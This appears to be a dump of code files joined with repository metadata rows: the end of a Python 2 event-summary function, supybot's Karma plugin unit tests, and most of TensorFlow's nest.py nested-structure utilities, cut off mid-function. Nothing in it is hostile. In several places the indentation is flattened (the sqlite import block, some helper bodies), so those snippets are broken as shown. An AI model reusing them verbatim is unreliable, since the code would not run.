    # Summarize events that had no handler as a two-column table; prints
    # nothing when every event was handled.
    keys = unhandled.keys()
    if not keys:
        return
    print "\nunhandled events:\n\n",
    print "%-40s %10s\n" % ("event", "count"),
    print "%-40s %10s\n" % ("----------------------------------------", \
        "-----------"),
    for event_name in keys:
        print "%-40s %10d\n" % (event_name, unhandled[event_name])
| gpl-2.0 |
haxwithaxe/supybot | plugins/Karma/test.py | 14 | 9913 | ###
# Copyright (c) 2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
from supybot.test import *
try:
import sqlite
except ImportError:
sqlite = None
if sqlite is not None:
    # Regression tests for the Karma plugin.  Only defined when the legacy
    # `sqlite` module is importable, since the plugin stores karma in sqlite.
    class KarmaTestCase(ChannelPluginTestCase):
        plugins = ('Karma',)
        def testKarma(self):
            # Basic ++/-- tracking, including case-insensitive lookups.
            self.assertError('karma')
            self.assertRegexp('karma foobar', 'neutral karma')
            try:
                conf.replyWhenNotCommand = True
                self.assertNoResponse('foobar++', 2)
            finally:
                conf.replyWhenNotCommand = False
            self.assertRegexp('karma foobar', 'increased 1.*total.*1')
            self.assertRegexp('karma FOOBAR', 'increased 1.*total.*1')
            self.assertNoResponse('foobar--', 2)
            self.assertRegexp('karma foobar', 'decreased 1.*total.*0')
            self.assertRegexp('karma FOOBAR', 'decreased 1.*total.*0')
            self.assertNoResponse('FOO++', 2)
            self.assertNoResponse('BAR--', 2)
            self.assertRegexp('karma foo bar foobar', '.*foo.*foobar.*bar.*')
            self.assertRegexp('karma FOO BAR FOOBAR', '.*foo.*foobar.*bar.*')
            self.assertRegexp('karma FOO BAR FOOBAR',
                              '.*FOO.*foobar.*BAR.*', flags=0)
            self.assertRegexp('karma foo bar foobar asdfjkl', 'asdfjkl')
            # Test case-insensitive
            self.assertNoResponse('MOO++', 2)
            self.assertRegexp('karma moo',
                              'Karma for [\'"]moo[\'"].*increased 1.*total.*1')
            self.assertRegexp('karma MoO',
                              'Karma for [\'"]MoO[\'"].*increased 1.*total.*1')
        def testKarmaRankingDisplayConfigurable(self):
            # rankingDisplay caps how many subjects the ranking output shows.
            try:
                orig = conf.supybot.plugins.Karma.response()
                conf.supybot.plugins.Karma.response.setValue(True)
                original = conf.supybot.plugins.Karma.rankingDisplay()
                self.assertNotError('foo++')
                self.assertNotError('foo++')
                self.assertNotError('foo++')
                self.assertNotError('foo++')
                self.assertNotError('bar++')
                self.assertNotError('bar++')
                self.assertNotError('bar++')
                self.assertNotError('baz++')
                self.assertNotError('baz++')
                self.assertNotError('quux++')
                self.assertNotError('xuuq--')
                self.assertNotError('zab--')
                self.assertNotError('zab--')
                self.assertNotError('rab--')
                self.assertNotError('rab--')
                self.assertNotError('rab--')
                self.assertNotError('oof--')
                self.assertNotError('oof--')
                self.assertNotError('oof--')
                self.assertNotError('oof--')
                self.assertRegexp('karma', 'foo.*bar.*baz.*oof.*rab.*zab')
                conf.supybot.plugins.Karma.rankingDisplay.setValue(4)
                self.assertRegexp('karma', 'foo.*bar.*baz.*quux')
            finally:
                conf.supybot.plugins.Karma.response.setValue(orig)
                conf.supybot.plugins.Karma.rankingDisplay.setValue(original)
        def testMost(self):
            # "most increased/decreased/active" rankings reorder as karma moves.
            self.assertError('most increased')
            self.assertError('most decreased')
            self.assertError('most active')
            self.assertHelp('most aldsfkj')
            self.assertNoResponse('foo++', 1)
            self.assertNoResponse('foo++', 1)
            self.assertNoResponse('bar++', 1)
            self.assertNoResponse('bar--', 1)
            self.assertNoResponse('bar--', 1)
            self.assertRegexp('karma most active', 'bar.*foo')
            self.assertRegexp('karma most increased', 'foo.*bar')
            self.assertRegexp('karma most decreased', 'bar.*foo')
            self.assertNoResponse('foo--', 1)
            self.assertNoResponse('foo--', 1)
            self.assertNoResponse('foo--', 1)
            self.assertNoResponse('foo--', 1)
            self.assertRegexp('karma most active', 'foo.*bar')
            self.assertRegexp('karma most increased', 'foo.*bar')
            self.assertRegexp('karma most decreased', 'foo.*bar')
        def testSimpleOutput(self):
            # simpleOutput switches replies to the terse "subject: n" form.
            try:
                orig = conf.supybot.plugins.Karma.simpleOutput()
                conf.supybot.plugins.Karma.simpleOutput.setValue(True)
                self.assertNoResponse('foo++', 2)
                self.assertResponse('karma foo', 'foo: 1')
                self.assertNoResponse('bar--', 2)
                self.assertResponse('karma bar', 'bar: -1')
            finally:
                conf.supybot.plugins.Karma.simpleOutput.setValue(orig)
        def testSelfRating(self):
            # Rating one's own nick is gated by allowSelfRating.
            nick = self.nick
            try:
                orig = conf.supybot.plugins.Karma.allowSelfRating()
                conf.supybot.plugins.Karma.allowSelfRating.setValue(False)
                self.assertError('%s++' % nick)
                self.assertResponse('karma %s' % nick,
                                    '%s has neutral karma.' % nick)
                conf.supybot.plugins.Karma.allowSelfRating.setValue(True)
                self.assertNoResponse('%s++' % nick, 2)
                self.assertRegexp('karma %s' % nick,
                       'Karma for [\'"]%s[\'"].*increased 1.*total.*1' % nick)
            finally:
                conf.supybot.plugins.Karma.allowSelfRating.setValue(orig)
        def testKarmaOutputConfigurable(self):
            # With response enabled, ++ acknowledges instead of staying silent.
            self.assertNoResponse('foo++', 2)
            try:
                orig = conf.supybot.plugins.Karma.response()
                conf.supybot.plugins.Karma.response.setValue(True)
                self.assertNotError('foo++')
            finally:
                conf.supybot.plugins.Karma.response.setValue(orig)
        def testKarmaMostDisplayConfigurable(self):
            # mostDisplay caps how many entries "most ..." lists.
            self.assertNoResponse('foo++', 1)
            self.assertNoResponse('foo++', 1)
            self.assertNoResponse('bar++', 1)
            self.assertNoResponse('bar--', 1)
            self.assertNoResponse('bar--', 1)
            self.assertNoResponse('foo--', 1)
            self.assertNoResponse('foo--', 1)
            self.assertNoResponse('foo--', 1)
            self.assertNoResponse('foo--', 1)
            try:
                orig = conf.supybot.plugins.Karma.mostDisplay()
                conf.supybot.plugins.Karma.mostDisplay.setValue(1)
                self.assertRegexp('karma most active', '(?!bar)')
                conf.supybot.plugins.Karma.mostDisplay.setValue(25)
                self.assertRegexp('karma most active', 'bar')
            finally:
                conf.supybot.plugins.Karma.mostDisplay.setValue(orig)
        def testIncreaseKarmaWithNickNotCallingInvalidCommand(self):
            # "botnick: foo++" must not be parsed as an (invalid) command.
            self.assertSnarfNoResponse('%s: foo++' % self.irc.nick, 3)
        def testClear(self):
            self.assertNoResponse('foo++', 1)
            self.assertRegexp('karma foo', '1')
            self.assertNotError('karma clear foo')
            self.assertRegexp('karma foo', '0')
            self.assertNotRegexp('karma foo', '1')
        # def testNoKarmaDunno(self):
        #     self.assertNotError('load Infobot')
        #     self.assertNoResponse('foo++')
        def testMultiWordKarma(self):
            # Parenthesized subjects allow multi-word karma targets.
            self.assertNoResponse('(foo bar)++', 1)
            self.assertRegexp('karma "foo bar"', '1')
        def testUnaddressedKarma(self):
            # ++/-- without addressing the bot, gated by allowUnaddressedKarma.
            karma = conf.supybot.plugins.Karma
            resp = karma.response()
            unaddressed = karma.allowUnaddressedKarma()
            try:
                karma.response.setValue(True)
                karma.allowUnaddressedKarma.setValue(True)
                for m in ('++', '--'):
                    self.assertRegexp('foo%s' % m, 'operation')
                    self.assertSnarfRegexp('foo%s' % m, 'operation')
                    #self.assertNoResponse('foo bar%s' % m)
                    #self.assertSnarfNoResponse('foo bar%s' % m)
                    self.assertRegexp('(foo bar)%s' % m, 'operation')
                    self.assertSnarfRegexp('(foo bar)%s' % m, 'operation')
            finally:
                karma.response.setValue(resp)
                karma.allowUnaddressedKarma.setValue(unaddressed)
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| bsd-3-clause |
dancingdan/tensorflow | tensorflow/python/util/nest.py | 6 | 30946 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""## Functions for working with arbitrarily nested sequences of elements.
This module can perform operations on nested structures. A nested structure is a
Python sequence, tuple (including `namedtuple`), or dict that can contain
further sequences, tuples, and dicts.
attr.s decorated classes (http://www.attrs.org) are also supported, in the
same way as `namedtuple`.
The utilities here assume (and do not check) that the nested structures form a
'tree', i.e., no references in the structure of the input of these functions
should be recursive.
Example structures: `((3, 4), 5, (6, 7, (9, 10), 8))`, `(np.array(0),
(np.array([3, 4]), tf.constant([3, 4])))`
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, "__attrs_attrs__")
return [getattr(obj, a.name) for a in attrs]
def _sorted(dict_):
"""Returns a sorted list of the dict keys, with error if keys not sortable."""
try:
return sorted(_six.iterkeys(dict_))
except TypeError:
raise TypeError("nest only supports dicts with sortable keys.")
def _is_namedtuple(instance, strict=False):
  """Returns True iff `instance` is a `namedtuple`.

  Thin wrapper over the C++ `IsNamedtuple` helper exposed via swig.

  Args:
    instance: An instance of a Python object.
    strict: If True, `instance` is considered to be a `namedtuple` only if
        it is a "plain" namedtuple. For instance, a class inheriting
        from a `namedtuple` will be considered to be a `namedtuple`
        iff `strict=False`.

  Returns:
    True if `instance` is a `namedtuple`.
  """
  return _pywrap_tensorflow.IsNamedtuple(instance, strict)
# See the swig file (util.i) for documentation.
# C++-implemented predicates: _is_mapping(o) -> is o a dict-like mapping;
# _is_attrs(o) -> is o an attrs-decorated instance.
_is_mapping = _pywrap_tensorflow.IsMapping
_is_attrs = _pywrap_tensorflow.IsAttrs
def _sequence_like(instance, args):
  """Converts the sequence `args` to the same type as `instance`.

  Args:
    instance: an instance of `tuple`, `list`, `namedtuple`, `dict`, or
        `collections.OrderedDict`.
    args: elements to be converted to the `instance` type.

  Returns:
    `args` with the type of `instance`.
  """
  instance_type = type(instance)
  if _is_mapping(instance):
    # Values are paired with the *sorted* keys, matching the deterministic
    # order `flatten` uses; the original key iteration order of `instance`
    # only determines the ordering of the rebuilt mapping itself.  This
    # intentionally ignores OrderedDict insertion order to avoid bugs when
    # mixing ordered and plain dicts in a flatten/pack round trip.
    key_to_value = dict(zip(_sorted(instance), args))
    return instance_type(
        (key, key_to_value[key]) for key in _six.iterkeys(instance))
  if _is_namedtuple(instance) or _is_attrs(instance):
    # Namedtuples and attrs classes take their fields positionally.
    return instance_type(*args)
  # Plain sequences (list/tuple subclasses) accept a single iterable.
  return instance_type(args)
def _yield_value(iterable):
  """Yields the values of `iterable` in a deterministic order."""
  if _is_mapping(iterable):
    # Mapping values are emitted in sorted-key order (not insertion order)
    # so that flatten/pack round-trips are stable across dict types,
    # including OrderedDict (whose ordering is deliberately ignored).
    for key in _sorted(iterable):
      yield iterable[key]
  elif _is_attrs(iterable):
    # attrs instances yield their field values in declaration order.
    for attr_value in _get_attrs_values(iterable):
      yield attr_value
  else:
    for element in iterable:
      yield element
# See the swig file (util.i) for documentation.
# True iff the argument is a structure (sequence/dict/namedtuple/attrs),
# as opposed to a scalar leaf.
is_sequence = _pywrap_tensorflow.IsSequence
# See the swig file (util.i) for documentation.
# Returns the flat list of leaves of a nested structure, dict keys sorted.
flatten = _pywrap_tensorflow.Flatten
# See the swig file (util.i) for documentation.
# True iff two namedtuples have the same type name and fields.
_same_namedtuples = _pywrap_tensorflow.SameNamedtuples
class _DotString(object):
def __str__(self):
return "."
def __repr__(self):
return "."
_DOT = _DotString()
def assert_same_structure(nest1, nest2, check_types=True):
  """Asserts that two structures are nested in the same way.

  Note that namedtuples with identical name and fields are always considered
  to have the same shallow structure (even with `check_types=True`).
  For instance, this code will print `True`:

  ```python
  def nt(a, b):
    return collections.namedtuple('foo', 'a b')(a, b)
  print(assert_same_structure(nt(0, 1), nt(2, 3)))
  ```

  Args:
    nest1: an arbitrarily nested structure.
    nest2: an arbitrarily nested structure.
    check_types: if `True` (default) types of sequences are checked as well,
        including the keys of dictionaries. If set to `False`, for example a
        list and a tuple of objects will look the same if they have the same
        size. Note that namedtuples with identical name and fields are always
        considered to have the same shallow structure. Two types will also be
        considered the same if they are both list subtypes (which allows
        "list" and "_ListWrapper" from checkpointable dependency tracking to
        compare equal).

  Raises:
    ValueError: If the two structures do not have the same number of elements
        or if the two structures are not nested in the same way.
    TypeError: If the two structures differ in the type of sequence in any of
        their substructures. Only possible if `check_types` is `True`.
  """
  try:
    _pywrap_tensorflow.AssertSameStructure(nest1, nest2, check_types)
  except (ValueError, TypeError) as e:
    # Re-raise the same exception type, augmented with dot-skeleton
    # renderings of both structures to make the mismatch easier to locate.
    skeleton1 = str(map_structure(lambda _: _DOT, nest1))
    skeleton2 = str(map_structure(lambda _: _DOT, nest2))
    raise type(e)("%s\n"
                  "Entire first structure:\n%s\n"
                  "Entire second structure:\n%s"
                  % (str(e), skeleton1, skeleton2))
def flatten_dict_items(dictionary):
  """Returns a dictionary with flattened keys and values.

  Both keys and values may be arbitrarily nested structures; each key/value
  pair must share the same nested structure, and the flattened keys across
  the whole dictionary must be unique:

  ```python
  example_dictionary = {(4, 5, (6, 8)): ("a", "b", ("c", "d"))}
  result = {4: "a", 5: "b", 6: "c", 8: "d"}
  flatten_dict_items(example_dictionary) == result
  ```

  Args:
    dictionary: the dictionary to zip

  Returns:
    The zipped dictionary.

  Raises:
    TypeError: If the input is not a dictionary.
    ValueError: If any key and value have not the same structure, or if
      keys are not unique.
  """
  if not isinstance(dictionary, (dict, _collections.Mapping)):
    raise TypeError("input must be a dictionary")
  flat_dictionary = {}
  for key, value in _six.iteritems(dictionary):
    if not is_sequence(key):
      # Scalar key: carried over as-is (still subject to the uniqueness check).
      if key in flat_dictionary:
        raise ValueError(
            "Could not flatten dictionary: key %s is not unique." % key)
      flat_dictionary[key] = value
      continue
    # Structured key: both sides are flattened and zipped pairwise, so they
    # must produce the same number of leaves.
    flat_key = flatten(key)
    flat_value = flatten(value)
    if len(flat_key) != len(flat_value):
      raise ValueError(
          "Could not flatten dictionary. Key had %d elements, but value had "
          "%d elements. Key: %s, value: %s."
          % (len(flat_key), len(flat_value), flat_key, flat_value))
    for new_key, new_value in zip(flat_key, flat_value):
      if new_key in flat_dictionary:
        raise ValueError(
            "Could not flatten dictionary: key %s is not unique." % (new_key))
      flat_dictionary[new_key] = new_value
  return flat_dictionary
def _packed_nest_with_indices(structure, flat, index):
  """Helper for pack_sequence_as: packs a slice of `flat` like `structure`.

  Args:
    structure: Substructure (list / tuple / dict) to mimic.
    flat: Flattened values to output substructure for.
    index: Index at which to start reading from flat.

  Returns:
    The tuple (new_index, packed), where:
      * new_index - the updated index into `flat` having processed
        `structure`.
      * packed - the subset of `flat` corresponding to `structure`, having
        started at `index`, and packed into the same nested format.

  Raises:
    IndexError: if `structure` contains more elements than `flat`
      (assuming indexing starts from `index`).
  """
  packed = []
  cursor = index
  for substructure in _yield_value(structure):
    if is_sequence(substructure):
      # Recurse into nested structures; the cursor advances past the leaves
      # the recursive call consumed.
      cursor, child = _packed_nest_with_indices(substructure, flat, cursor)
      packed.append(_sequence_like(substructure, child))
    else:
      # Leaf position: consume exactly one flat element.
      packed.append(flat[cursor])
      cursor += 1
  return cursor, packed
def pack_sequence_as(structure, flat_sequence):
  """Returns a given flattened sequence packed into a given structure.

  If `structure` is a scalar, `flat_sequence` must be a single-element list;
  in this case the return value is `flat_sequence[0]`.

  If `structure` is or contains a dict instance, the keys will be sorted to
  pack the flat sequence in deterministic order. This is true also for
  `OrderedDict` instances: their sequence order is ignored, the sorting order
  of keys is used instead. The same convention is followed in `flatten`.
  This correctly repacks dicts and `OrderedDict`s after they have been
  flattened, and also allows flattening an `OrderedDict` and then repacking
  it back using a corresponding plain dict, or vice-versa.
  Dictionaries with non-sortable keys cannot be flattened.

  Args:
    structure: Nested structure, whose structure is given by nested lists,
        tuples, and dicts. Note: numpy arrays and strings are considered
        scalars.
    flat_sequence: flat sequence to pack.

  Returns:
    packed: `flat_sequence` converted to have the same recursive structure as
      `structure`.

  Raises:
    ValueError: If `flat_sequence` and `structure` have different
      element counts.
    TypeError: `structure` is or contains a dict with non-sortable keys.
  """
  if not is_sequence(flat_sequence):
    raise TypeError("flat_sequence must be a sequence")
  if not is_sequence(structure):
    # Scalar structure: the flat sequence must contain exactly one leaf.
    if len(flat_sequence) != 1:
      raise ValueError("Structure is a scalar but len(flat_sequence) == %d > 1"
                       % len(flat_sequence))
    return flat_sequence[0]
  try:
    final_index, packed = _packed_nest_with_indices(structure, flat_sequence, 0)
    # "Too few leaves" raises IndexError inside the helper; "too many
    # leaves" is detected here and funneled through the same IndexError
    # path so one handler produces the detailed count-mismatch error.
    if final_index < len(flat_sequence):
      raise IndexError
  except IndexError:
    flat_structure = flatten(structure)
    if len(flat_structure) != len(flat_sequence):
      raise ValueError(
          "Could not pack sequence. Structure had %d elements, but "
          "flat_sequence had %d elements. Structure: %s, flat_sequence: %s." %
          (len(flat_structure), len(flat_sequence), structure, flat_sequence))
  return _sequence_like(structure, packed)
def map_structure(func, *structure, **check_types_dict):
  """Applies `func` to each entry in `structure` and returns a new structure.

  Applies `func(x[0], x[1], ...)` where x[i] is an entry in `structure[i]`.
  All structures in `structure` must have the same arity, and the return
  value will contain the results in the same structure.

  Args:
    func: A callable that accepts as many arguments as there are structures.
    *structure: scalar, or tuple or list of constructed scalars and/or other
        tuples/lists, or scalars. Note: numpy arrays are considered scalars.
    **check_types_dict: only valid keyword argument is `check_types`. If set
        to `True` (default) the types of iterables within the structures have
        to be same (e.g. `map_structure(func, [1], (1,))` raises a
        `TypeError` exception). To allow this set this argument to `False`.
        Note that namedtuples with identical name and fields are always
        considered to have the same shallow structure.

  Returns:
    A new structure with the same arity as `structure`, whose values
    correspond to `func(x[0], x[1], ...)` where `x[i]` is a value in the
    corresponding location in `structure[i]`. If there are different sequence
    types and `check_types` is `False` the sequence types of the first
    structure will be used.

  Raises:
    TypeError: If `func` is not callable or if the structures do not match
      each other by depth tree.
    ValueError: If no structure is provided or if the structures do not match
      each other by type.
    ValueError: If wrong keyword arguments are provided.
  """
  if not callable(func):
    raise TypeError("func must be callable, got: %s" % func)
  if not structure:
    raise ValueError("Must provide at least one structure")
  # `check_types` is accepted only via **kwargs (it cannot be a normal
  # keyword because *structure is variadic); reject anything else.
  check_types = True
  if check_types_dict:
    if "check_types" not in check_types_dict or len(check_types_dict) > 1:
      raise ValueError("Only valid keyword argument is check_types")
    check_types = check_types_dict["check_types"]
  template = structure[0]
  for other in structure[1:]:
    assert_same_structure(template, other, check_types=check_types)
  # All structures flatten to leaf lists of equal length; zip groups the
  # co-located leaves so func sees one leaf from each structure.
  flattened = [flatten(s) for s in structure]
  mapped = [func(*leaves) for leaves in zip(*flattened)]
  return pack_sequence_as(template, mapped)
def map_structure_with_paths(func, *structure, **kwargs):
  """Maps `func` over the leaves of several structures, passing leaf paths.

  Evaluates `func(path, x[0], x[1], ..., **kwargs)` at every leaf position,
  where `path` is the joined string path to that leaf and `x[i]` is the leaf
  taken from `structure[i]`. All input structures must have the same arity;
  the results are repacked into the shape of the first structure.

  Args:
    func: A callable with signature `func(path, *values, **kwargs)` that is
      applied at each leaf position.
    *structure: One or more compatible structures to map over.
    **kwargs: Forwarded to `func`, except for the special keyword
      `check_types`. If `check_types` is `True` (the default) the iterable
      types inside the structures must match exactly; set it to `False` to
      allow mixing sequence types of the same arity.

  Returns:
    A structure with the same shape as `structure[0]` whose leaves are the
    results of applying `func` to the corresponding leaves of the inputs.

  Raises:
    TypeError: If `func` is not callable, or (with `check_types=True`) the
      structures use differing sequence types.
    ValueError: If no structures are provided.
  """
  if not callable(func):
    raise TypeError("func must be callable, got: %s" % func)
  if not structure:
    raise ValueError("Must provide at least one structure")
  check_types = kwargs.pop("check_types", True)
  for extra_structure in structure[1:]:
    assert_same_structure(structure[0], extra_structure,
                          check_types=check_types)
  # Each entry of per_structure is the flat [(path, value), ...] list for one
  # input; transposing with zip groups the entries of each leaf position.
  per_structure = [flatten_with_joined_string_paths(s) for s in structure]
  # For one leaf position a group is ((p1, v1), ..., (pm, vm)); zip(*group)
  # separates the (identical, since structures match) paths from the values.
  grouped = [zip(*leaf_group) for leaf_group in zip(*per_structure)]
  results = [func(paths[0], *values, **kwargs)
             for paths, values in grouped]
  return pack_sequence_as(structure[0], results)
def _yield_flat_up_to(shallow_tree, input_tree):
  """Yields elements of `input_tree`, flattened only as deep as `shallow_tree`."""
  if not is_sequence(shallow_tree):
    # `shallow_tree` bottoms out here, so whatever remains of `input_tree`
    # (possibly still a nested structure) is emitted as a single element.
    yield input_tree
    return
  paired_branches = zip(_yield_value(shallow_tree), _yield_value(input_tree))
  for shallow_branch, input_branch in paired_branches:
    for partial_leaf in _yield_flat_up_to(shallow_branch, input_branch):
      yield partial_leaf
def assert_shallow_structure(shallow_tree, input_tree, check_types=True):
  """Asserts that `shallow_tree` is a shallow structure of `input_tree`.

  That is, this function tests if the `input_tree` structure can be created
  from the `shallow_tree` structure by replacing its leaf nodes with deeper
  tree structures.

  Examples:

  The following code will raise an exception:
  ```python
    shallow_tree = ["a", "b"]
    input_tree = ["c", ["d", "e"], "f"]
    assert_shallow_structure(shallow_tree, input_tree)
  ```

  The following code will not raise an exception:
  ```python
    shallow_tree = ["a", "b"]
    input_tree = ["c", ["d", "e"]]
    assert_shallow_structure(shallow_tree, input_tree)
  ```

  Args:
    shallow_tree: an arbitrarily nested structure.
    input_tree: an arbitrarily nested structure.
    check_types: if `True` (default) the sequence types of `shallow_tree` and
      `input_tree` have to be the same. Note that even with check_types==True,
      this function will consider two different namedtuple classes with the
      same name and _fields attribute to be the same class.

  Raises:
    TypeError: If `shallow_tree` is a sequence but `input_tree` is not.
    TypeError: If the sequence types of `shallow_tree` are different from
      `input_tree`. Only raised if `check_types` is `True`.
    ValueError: If the sequence lengths of `shallow_tree` are different from
      `input_tree`.
  """
  # If `shallow_tree` is a leaf, any `input_tree` is acceptable, so only the
  # sequence case needs validation.
  if is_sequence(shallow_tree):
    if not is_sequence(input_tree):
      raise TypeError(
          "If shallow structure is a sequence, input must also be a sequence. "
          "Input has type: %s." % type(input_tree))
    if check_types and not isinstance(input_tree, type(shallow_tree)):
      # Duck-typing means that nest should be fine with two different
      # namedtuples with identical name and fields.
      shallow_is_namedtuple = _is_namedtuple(shallow_tree, False)
      input_is_namedtuple = _is_namedtuple(input_tree, False)
      if shallow_is_namedtuple and input_is_namedtuple:
        if not _same_namedtuples(shallow_tree, input_tree):
          raise TypeError(
              "The two namedtuples don't have the same sequence type. Input "
              "structure has type %s, while shallow structure has type %s."
              % (type(input_tree), type(shallow_tree)))
      else:
        raise TypeError(
            "The two structures don't have the same sequence type. Input "
            "structure has type %s, while shallow structure has type %s."
            % (type(input_tree), type(shallow_tree)))
    if len(input_tree) != len(shallow_tree):
      raise ValueError(
          "The two structures don't have the same sequence length. Input "
          "structure has length %s, while shallow structure has length %s."
          % (len(input_tree), len(shallow_tree)))
    if check_types and isinstance(shallow_tree, (dict, _collections.Mapping)):
      if set(input_tree) != set(shallow_tree):
        raise ValueError(
            "The two structures don't have the same keys. Input "
            "structure has keys %s, while shallow structure has keys %s." %
            (list(_six.iterkeys(input_tree)),
             list(_six.iterkeys(shallow_tree))))
      # Convert both mappings to key-sorted (key, value) lists so that the
      # recursive zip below pairs entries of the same key together.
      input_tree = list(sorted(_six.iteritems(input_tree)))
      shallow_tree = list(sorted(_six.iteritems(shallow_tree)))
    # Recurse pairwise; recursion stops wherever `shallow_tree` has a leaf.
    for shallow_branch, input_branch in zip(shallow_tree, input_tree):
      assert_shallow_structure(shallow_branch, input_branch,
                               check_types=check_types)
def flatten_up_to(shallow_tree, input_tree):
  """Partially flattens `input_tree` down to the depth of `shallow_tree`.

  Structure in `input_tree` that lies deeper than `shallow_tree` is kept
  intact: each leaf position of `shallow_tree` contributes one element of the
  output, namely the (possibly still nested) corresponding subtree of
  `input_tree`. When neither argument is a sequence the result is simply
  `[input_tree]`.

  Examples:
  ```python
  input_tree = [[[2, 2], [3, 3]], [[4, 9], [5, 5]]]
  shallow_tree = [[True, True], [False, True]]
  flatten_up_to(shallow_tree, input_tree)
  # -> [[2, 2], [3, 3], [4, 9], [5, 5]]

  flatten_up_to(0, 0)              # -> [0]
  flatten_up_to(0, [0, 1, 2])      # -> [[0, 1, 2]]
  flatten_up_to([0, 1, 2], 0)      # -> TypeError
  ```

  Args:
    shallow_tree: a possibly pruned structure of `input_tree`.
    input_tree: an arbitrarily nested structure or a scalar object.
      Note, numpy arrays are considered scalars.

  Returns:
    A Python list: `input_tree` flattened only as deep as `shallow_tree`.

  Raises:
    TypeError: If `shallow_tree` is a sequence but `input_tree` is not, or
      their sequence types differ.
    ValueError: If the sequence lengths of `shallow_tree` differ from
      `input_tree`.
  """
  # Validate compatibility first so the generator below cannot silently
  # truncate on mismatched structures.
  assert_shallow_structure(shallow_tree, input_tree)
  partially_flat = _yield_flat_up_to(shallow_tree, input_tree)
  return list(partially_flat)
def map_structure_up_to(shallow_tree, func, *inputs):
  """Applies `func` to inputs flattened only as deep as `shallow_tree`.

  Each input is partially flattened up to `shallow_tree` (so leaves handed to
  `func` may themselves be nested structures), `func` is applied positionally
  across the inputs, and the results are repacked into the shape of
  `shallow_tree`.

  Example:
  ```python
  data_list = [[2, 4, 6, 8], [[1, 3, 5, 7, 9], [3, 5, 7]]]
  name_list = ['evens', ['odds', 'primes']]
  map_structure_up_to(
      name_list,
      lambda name, sec: "first_{}_{}".format(len(sec), name),
      name_list, data_list)
  # -> ['first_4_evens', ['first_5_odds', 'first_3_primes']]
  ```

  Args:
    shallow_tree: a shallow tree, common to all the inputs.
    func: callable applied to each group of corresponding partial leaves; it
      must accept `len(inputs)` positional arguments.
    *inputs: arbitrarily nested structures compatible with `shallow_tree`.

  Returns:
    The result of repeatedly applying `func`, with the same structure as
    `shallow_tree`.

  Raises:
    TypeError: If `shallow_tree` is a sequence but an input is not, or their
      sequence types differ.
    ValueError: If no inputs are given, or sequence lengths differ from
      `shallow_tree`.
  """
  if not inputs:
    raise ValueError("Cannot map over no sequences")
  for candidate in inputs:
    assert_shallow_structure(shallow_tree, candidate)
  # Partially flatten every input, apply func across corresponding elements,
  # then rebuild using shallow_tree as the template.
  flat_inputs = [flatten_up_to(shallow_tree, candidate)
                 for candidate in inputs]
  mapped = [func(*group) for group in zip(*flat_inputs)]
  return pack_sequence_as(structure=shallow_tree, flat_sequence=mapped)
def get_traverse_shallow_structure(traverse_fn, structure):
  """Generates a shallow structure from a `traverse_fn` and `structure`.

  `traverse_fn` must accept any possible subtree of `structure` and return
  a depth=1 structure containing `True` or `False` values, describing which
  of the top-level subtrees may be traversed. It may also return scalar
  `True` or `False` meaning "traversal is OK / not OK for all subtrees."

  Examples are available in the unit tests (nest_test.py).

  Args:
    traverse_fn: Function taking a substructure and returning either a scalar
      `bool` (whether to traverse that substructure or not) or a depth=1
      shallow structure of the same type, describing which parts of the
      substructure to traverse.
    structure: The structure to traverse.

  Returns:
    A shallow structure containing python bools, which can be passed to
    `map_structure_up_to` and `flatten_up_to`.

  Raises:
    TypeError: if `traverse_fn` returns a sequence for a non-sequence input,
      or a structure with depth higher than 1 for a sequence input,
      or if any leaf values in the returned structure or scalar are not type
      `bool`.
  """
  to_traverse = traverse_fn(structure)
  if not is_sequence(structure):
    # A leaf: traverse_fn must answer with a plain bool, which becomes the
    # corresponding leaf of the shallow result.
    if not isinstance(to_traverse, bool):
      raise TypeError("traverse_fn returned structure: %s for non-structure: %s"
                      % (to_traverse, structure))
    return to_traverse
  level_traverse = []
  if isinstance(to_traverse, bool):
    if not to_traverse:
      # Do not traverse this substructure at all. Exit early.
      return False
    else:
      # Traverse the entire substructure.
      for branch in _yield_value(structure):
        level_traverse.append(
            get_traverse_shallow_structure(traverse_fn, branch))
  elif not is_sequence(to_traverse):
    raise TypeError("traverse_fn returned a non-bool scalar: %s for input: %s"
                    % (to_traverse, structure))
  else:
    # Traverse some subset of this substructure: to_traverse must be a
